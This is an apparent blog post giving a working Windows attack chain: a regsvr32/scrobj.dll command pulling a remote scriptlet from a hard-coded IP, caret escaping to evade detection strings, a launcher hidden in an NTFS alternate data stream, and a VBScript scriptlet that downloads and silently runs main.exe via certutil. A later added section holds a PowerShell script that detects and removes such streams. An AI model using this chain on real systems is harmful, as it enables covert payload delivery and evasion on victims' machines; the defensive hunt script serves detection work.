XhstormR


On a dark desert highway Cool wind in my hair


Alternate Data Stream

Updated on 2019-09-30

Stage 1: regsvr32.exe fetches the remote scriptlet and hands it to scrobj.dll, which executes it. /s is silent, /u takes the DllUnregisterServer path so nothing is left registered, and /i: passes the URL through to scrobj.dll:

regsvr32.exe /s /u /i:http://47.98.135.65/main/main.xml scrobj.dll

Stage 2: write that command line into an alternate data stream named payload.bat. The carets are cmd.exe escape characters and are dropped by echo, so the stream receives the plain command while the typed line avoids a literal match on "regsvr32.exe /s /u /i:". The stream host (here "...") does not show the stream in a normal dir listing; dir /r does:

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:http://47.98.135.65/main/main.xml ^scrobj.dll > ...:payload.bat

Stage 3: run the stream. cmd.exe reads its commands from standard input when stdin is redirected, so the stream is executed without ever being a regular file on disk:

cmd.exe - < ...:payload.bat

main.xml

<?xml version="1.0" encoding="UTF-8"?>
<scriptlet>
<registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
    <![CDATA[
        ' Executed by scrobj.dll when regsvr32 /u /i:<url> scrobj.dll loads this scriptlet.
        ' The command chain: change to %TEMP%, download main.exe with certutil unless it is
        ' already there, clear certutil's URL cache (single & so main.exe runs even if the
        ' delete fails), then start main.exe with the argument "r".
        ' Window style 0 hides the console; the final False means do not wait for it to exit.
        CreateObject("WScript.Shell").Run _
            "%ComSpec% /c cd /d %TEMP% && " & _
            "(IF NOT EXIST main.exe certutil.exe -urlcache -split -f http://47.98.135.65/main/main.exe) && " & _
            "certutil.exe -urlcache * delete & " & _
            "main.exe r", 0, False
    ]]>
</script>
</registration>
</scriptlet>

delete.bat

rem %1 must be a fully qualified path. The \\?\ prefix switches off Win32 path
rem normalization (and requires an absolute path), which is what lets del and rd
rem reach names a normal path cannot, such as the "..." stream host used above.
del /f /a /q \\?\%1
rem Same again in case %1 is a directory rather than a file.
rd /s /q \\?\%1
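The defensive counterpart to the three stages above, as an added example that is not part of the original post: a PowerShell hunt script that walks a directory, lists every named NTFS stream, flags stream contents that look like the regsvr32/scrobj.dll launcher written by the echo command, and flags host names that ordinary Win32 paths cannot address (dots only, or trailing dot or space), which is exactly the case delete.bat handles with the \\?\ prefix. The parameter names, the indicator regex and the -Remove switch are my own choices and are not taken from the page.

```powershell
<#
  Added example (not from the original post). Enumerates alternate data streams under
  $Root, flags the regsvr32/scrobj.dll launcher described above, and flags host names
  that need the \\?\ prefix to delete. $Root, $Indicator, $Unaddressable and -Remove
  are assumptions of this example.
#>
param(
    [string]$Root = (Get-Location).Path,
    [switch]$Remove
)

# Indicator for the launcher line stored in the stream (assumed regex, tune to taste).
$Indicator = 'regsvr32(\.exe)?\s.*?/i:\s*\S+.*scrobj\.dll'
# Names that Win32 path normalization strips or rewrites, so del/rd fail without \\?\.
$Unaddressable = '^\.{3,}$|[. ]$'

function Get-SuspiciousStream {
    param([string]$Path)
    Get-ChildItem -LiteralPath $Path -Recurse -Force -ErrorAction SilentlyContinue |
      ForEach-Object {
        $item = $_
        # -Stream * returns every stream of the item; ':$DATA' is the unnamed main
        # stream, so only the named ones are kept.
        Get-Item -LiteralPath $item.FullName -Stream * -ErrorAction SilentlyContinue |
          Where-Object { $_.Stream -ne ':$DATA' } |
          ForEach-Object {
            $body = Get-Content -LiteralPath $item.FullName -Stream $_.Stream -Raw -ErrorAction SilentlyContinue
            [pscustomobject]@{
                File     = $item.FullName
                Stream   = $_.Stream
                Length   = $_.Length
                Launcher = [bool]($body -match $Indicator)
                OddName  = [bool]($item.Name -match $Unaddressable)
            }
          }
      }
}

$findings = @(Get-SuspiciousStream -Path $Root)
$findings | Format-Table -AutoSize

foreach ($f in ($findings | Where-Object { $_.Launcher })) {
    if ($Remove) {
        # Deleting only the named stream leaves the host file itself intact.
        Remove-Item -LiteralPath $f.File -Stream $f.Stream
        Write-Host "removed $($f.File):$($f.Stream)"
    }
    if ($f.OddName) {
        Write-Warning "host '$($f.File)' cannot be addressed by a normal path; use the \\?\ form from delete.bat to remove the host itself"
    }
}
```

Run it as `.\Find-AdsLauncher.ps1 -Root C:\Users\victim` to report, and add `-Remove` to strip matching streams. Removing the stream is enough to disarm stage 3; the host file or directory is only worth deleting when it was created solely to carry the stream, and that is the case where the \\?\ prefix in delete.bat becomes necessary.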
